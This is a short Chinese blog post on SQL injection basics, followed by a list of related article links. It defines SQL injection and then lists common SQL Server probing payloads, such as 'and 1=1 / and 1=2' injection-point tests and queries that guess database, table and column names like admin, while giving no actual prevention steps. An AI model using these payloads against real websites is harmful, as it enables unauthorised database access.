基础知识之防止SQL注入
来源:互联网 发布:centos 7 ant 编辑:程序博客网 时间:2024/05/21 13:29
1)什么是SQL注入
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
2)一些常见的SQL注入语句
1、返回的是连接的数据库名
and db_name()>0
2、作用是获取连接用户名
and user>0
3、猜解所有数据库名称
and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 dbid=6,7,8分别得到其它库名
4、猜解数据库中用户名表的名称
先猜表名
And (Select count(*) from 表名)<>0
猜列名
And (Select count(列名) from 表名)<>0
或者也可以这样
and exists (select * from 表名)
and exists (select 列名 from 表名)
5、查看数据库角色
;use model--
6判断有无注入点
; and 1=1 and 1=2
7.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
由于SQL语句比较多 欢迎大家去查看百度百科的sql注入或百度文档的SQL注入,在此我就不一一举例了! 0 0
- 基础知识之防止SQL注入
- Java 之防止 SQL 注入
- jsp 防止sql注入 之 preparestatement篇
- 机房收费系统之防止SQL注入
- 防止sql注入之PreparedStatement篇
- sql注入之必备的基础知识
- 防止sql注入
- asp 防止SQL注入
- sql注入防止办法
- sql注入防止办法
- 怎么防止[SQL注入
- 如何防止SQL注入
- 防止sql注入
- SQL注入防止攻击
- 防止sql注入攻击
- 防止SQL注入
- 如何防止SQL注入
- 防止SQL注入
- leetcode No41. First Missing Positive
- 分布式缓存-Memcached
- BGRABitmap图像操作12:文本输出带阴影
- 实用SQL语句大全
- 20160921
- 基础知识之防止SQL注入
- Android软键盘监听
- 单例模式
- Android工具
- eclipse maven 项目
- Mac ubuntu安装无线驱动
- 货币计算为什么使用BigDecimal
- 树形DP(完美的服务,uva 1218)
- 进程的常用调度算法